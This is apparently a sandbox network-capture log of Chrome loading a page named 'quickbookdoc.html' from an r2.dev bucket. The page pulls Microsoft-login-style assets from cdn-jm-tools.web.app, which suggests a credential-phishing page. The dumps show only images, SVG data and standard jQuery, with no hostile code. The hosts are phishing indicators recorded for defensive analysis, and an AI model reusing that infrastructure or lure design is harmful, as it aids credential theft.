2024-04-16 23:37:39 UTC	1378	IN	Data Raw: 30 2c 30 2c 31 2d 33 2e 36 35 32 2d 31 2e 33 35 32 41 34 2e 39 38 37 2c 34 2e 39 38 37 2c 30 2c 30 2c 31 2c 36 36 2e 34 30 36 2c 31 33 2e 36 6d 32 2e 34 32 35 2d 2e 30 37 37 61 33 2e 35 33 35 2c 33 2e 35 33 35 2c 30 2c 30 2c 30 2c 2e 37 2c 32 2e 33 36 38 2c 32 2e 35 30 35 2c 32 2e 35 30 35 2c 30 2c 30 2c 30 2c 32 2e 30 31 31 2e 38 31 38 2c 32 2e 33 34 35 2c 32 2e 33 34 35 2c 30 2c 30 2c 30 2c 31 2e 39 33 34 2d 2e 38 31 38 2c 33 2e 37 38 33 2c 33 2e 37 38 33 2c 30 2c 30 2c 30 2c 2e 36 36 34 2d 32 2e 34 32 35 2c 33 2e 36 35 31 2c 33 2e 36 35 31 2c 30 2c 30 2c 30 2d 2e 36 38 38 2d 32 2e 34 31 31 2c 32 2e 33 38 39 2c 32 2e 33 38 39 2c 30 2c 30 2c 30 2d 31 2e 39 32 39 2d 2e 38 31 33 2c 32 2e 34 34 2c 32 2e 34 34 2c 30 2c 30 2c 30 2d 31 2e 39 38 38 2e 38 35 32 Data Ascii: 0,0,1-3.652-1.352A4.987,4.987,0,0,1,66.406,13.6m2.425-.077a3.535,3.535,0,0,0,.7,2.368,2.505,2.505,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.389,2.389,0,0,0-1.929-.813,2.44,2.44,0,0,0-1.988.852
2024-04-16 23:37:39 UTC	895	IN	Data Raw: 39 2c 30 2c 30 2c 30 2d 31 2e 39 38 37 2e 38 35 32 2c 33 2e 37 30 37 2c 33 2e 37 30 37 2c 30 2c 30 2c 30 2d 2e 37 30 37 2c 32 2e 34 33 6d 31 35 2e 34 36 34 2d 33 2e 31 30 39 48 39 39 2e 37 56 31 38 2e 34 48 39 37 2e 33 34 31 56 31 30 2e 34 31 32 48 39 35 2e 36 38 36 56 38 2e 35 30 37 68 31 2e 36 35 35 56 37 2e 31 33 61 33 2e 34 32 33 2c 33 2e 34 32 33 2c 30 2c 30 2c 31 2c 31 2e 30 31 35 2d 32 2e 35 35 35 2c 33 2e 35 36 31 2c 33 2e 35 36 31 2c 30 2c 30 2c 31 2c 32 2e 36 2d 31 2c 35 2e 38 30 37 2c 35 2e 38 30 37 2c 30 2c 30 2c 31 2c 2e 37 35 31 2e 30 34 33 2c 32 2e 39 39 33 2c 32 2e 39 39 33 2c 30 2c 30 2c 31 2c 2e 35 37 37 2e 31 33 56 35 2e 37 36 34 61 32 2e 34 32 32 2c 32 2e 34 32 32 2c 30 2c 30 2c 30 2d 2e 34 2d 2e 31 36 34 2c 32 2e 31 30 37 2c 32 2e 31 Data Ascii: 9,0,0,0-1.987.852,3.707,3.707,0,0,0-.707,2.43m15.464-3.109H99.7V18.4H97.341V10.412H95.686V8.507h1.655V7.13a3.423,3.423,0,0,1,1.015-2.555,3.561,3.561,0,0,1,2.6-1,5.807,5.807,0,0,1,.751.043,2.993,2.993,0,0,1,.577.13V5.764a2.422,2.422,0,0,0-.4-.164,2.107,2.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49714	199.36.158.100	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:39 UTC	678	OUT	GET /d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:39 UTC	590	IN	HTTP/1.1 200 OK Connection: close Content-Length: 240 Cache-Control: max-age=3600 Content-Type: image/png Etag: "a512441fed43fc63c5a2bbce213d4081532632f57c75eb60cb7dd0e4a1126b38" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Tue, 16 Apr 2024 23:37:39 GMT X-Served-By: cache-pdk-kfty2130070-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713310660.628053,VS0,VE2 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-16 23:37:39 UTC	240	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 a2 49 44 41 54 48 89 ed 94 bb 0d c2 40 10 05 c7 08 11 bb 05 3a 20 21 44 e2 25 14 40 25 f4 e2 3e 28 80 e4 05 34 40 46 48 4e 44 07 47 6a 9d 6c d9 27 ed 49 20 f9 85 1b cc 68 3f da 26 a5 44 cd ac aa d2 17 c1 7f 09 24 b5 92 da 52 c1 7a 2e 1c b8 01 1b 60 17 2a e8 c1 b7 c0 b9 04 0e 13 23 ca e1 b6 ef 61 82 08 38 40 33 f4 2a 7a f0 3d f0 04 de 33 58 17 db 8f bc 58 fd 4c 07 3b 80 b8 11 8d 76 60 fb 03 9c 80 17 70 95 74 08 15 44 49 26 77 90 49 ba 70 41 26 39 96 0a 46 97 1c 95 df f9 a6 8b a0 5a be 46 47 3c 26 c0 3a 39 11 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRw=pHYs~IDATH@: !D%@%>(4@FHNDGjl'I h?&D$Rz.`#a8@3z=3XXL;v`ptDI&wIpA&9FZFG<&:9IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	199.36.158.100	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:39 UTC	681	OUT	GET /d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:39 UTC	594	IN	HTTP/1.1 200 OK Connection: close Content-Length: 915 Cache-Control: max-age=3600 Content-Type: image/svg+xml Etag: "cf034e803491c0dbb1074332cd18fac418b94b0a139a7ddbf92ec40574951a8a" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Tue, 16 Apr 2024 23:37:39 GMT X-Served-By: cache-pdk-kfty2130025-PDK X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1713310660.644983,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-16 23:37:39 UTC	915	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 37 37 37 37 37 37 22 20 64 3d 22 4d 31 2e 31 34 33 2c 36 2e 38 35 37 61 31 2e 31 30 37 2c 31 2e 31 30 37 2c 30 2c 30 2c 31 2c 2e 34 34 36 2e 30 38 39 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2c 2e 36 30 37 2e 36 30 37 2c 31 2e 31 36 31 2c 31 2e 31 36 31 2c 30 2c 30 2c 31 2c 30 2c 2e 38 39 33 2c 31 2e 31 36 34 2c 31 2e 31 36 34 2c 30 2c 30 2c 31 2d 2e 36 30 37 2e 36 30 37 2c 31 2e 31 30 37 2c 31 2e Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49715	104.17.24.14	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:39 UTC	641	OUT	GET /ajax/libs/jquery/3.5.0/jquery.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:39 UTC	976	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 23:37:39 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03ec4-15d95" Last-Modified: Mon, 04 May 2020 16:11:48 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 70209 Expires: Sun, 06 Apr 2025 23:37:39 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cyxt%2BOLy7NXnCmlQWucxzgcqHxLL3%2B19s1Ce2V1s3AJLpmGnK4SZNF6b%2BtlJ04kt6iC%2FE5%2Fn0BqURSy%2Bnmj%2BIhY%2BizEVjTtI%2FX36QzLNgUELulh6Fk%2Bs6AhBahL76%2FSj60Z%2Foy8R"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 875801270ca86744-ATL alt-svc: h3=":443"; ma=86400
2024-04-16 23:37:39 UTC	393	IN	Data Raw: 37 62 64 65 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a Data Ascii: 7bde/! jQuery v3.5.0 \| (c) JS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("j
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 Data Ascii: Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"nu
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 6e Data Ascii: {return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b Data Ascii: ]))break;return e},makeArray:function(e,t){var n=t\|\|[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r+
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 Data Ascii: ?:\\\\.\|[^\\\\']))'\|\"((?:\\\\.\|[^\\\\\"]))\"\|("+I+"))\|)"+M+"\\]",F=":("+I+")(?:\$(('((?:\\\\.\|[^\\\\']))'\|\"((?:\\\\.\|[^\\\\\"]))\")\|((?:\\\\.\|[^\\\\()[\\]]\|"+W+"))\|.)\$\|)",B=new RegExp(M+"+","g"),$=new RegExp("^"+M+"+\|((?:^\|[^\\\\])(?:\\\\.))"
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65 6e 67 74 68 3f 66 75 6e 63 74 69 6f 6e 28 65 2c Data Ascii: e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d Data Ascii: nction e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 6e 74 7c 7c 65 3a 70 3b 72 65 74 75 72 6e 20 72 21 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 Data Ascii: nt\|\|e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(function(e){return
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d Data Ascii: AttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElem
2024-04-16 23:37:39 UTC	1369	IN	Data Raw: 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62 6c 65 64 3d 21 30 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 Data Ascii: tAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"[^$\|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).disabled=!0,2!==e.queryS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49709	104.18.3.35	443	6352	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 23:37:39 UTC	753	OUT	GET /https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg/ HTTP/1.1 Host: pub-778c9922a88c4d2c839b01025172bb0b.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 23:37:40 UTC	180	IN	HTTP/1.1 404 Not Found Date: Tue, 16 Apr 2024 23:37:40 GMT Content-Type: text/html Content-Length: 27242 Connection: close Server: cloudflare CF-RAY: 875801290d2553b1-ATL
2024-04-16 23:37:40 UTC	1189	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 